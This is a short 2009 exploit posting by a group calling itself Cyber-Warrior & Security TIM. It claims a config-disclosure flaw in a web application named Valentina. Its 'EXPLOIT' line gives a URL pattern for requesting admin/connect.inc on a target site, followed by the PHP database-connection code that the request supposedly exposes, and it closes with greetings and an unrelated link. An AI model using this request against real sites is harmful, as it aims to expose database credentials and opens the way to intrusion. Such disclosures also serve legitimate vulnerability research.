valentina-disclose.txt
Posted on 23 July 2009
< ------------------- header data start ------------------- > ### Cyber-Warrior & Security TIM - Bug Researchers Group ### # Application Name : Valentina # Vulnerable Type : Arbitrary Database Config Disclosure Vulnerability # Infection : SQL Info Get... # Author : Septemb0x # Script Down.& WebSite : http://s2.dosya.tc/valentina.zip.html - http://www.valya.ru ### Cyber-Warrior & Security TIM - Bug Researchers Group ### < ------------------- header data end of ------------------- > < -- bug code start -- > EXPLOIT : http://[target]/[path]/admin/connect.inc GET TO; <? mysql_connect($DB_HOST,$DB_USER,$DB_PASS) or die (mysql_error()); mysql_select_db($DB_NAME) or die (mysql_error()); ?> < -- bug code end of -- > # Greetz : BHDR & BARCOD3 & Cem & Asil Bey And All Friends... _________________________________________________________________ http://www.microsoft.com/turkiye/windows/windowslive/products/social-network-connector.aspx
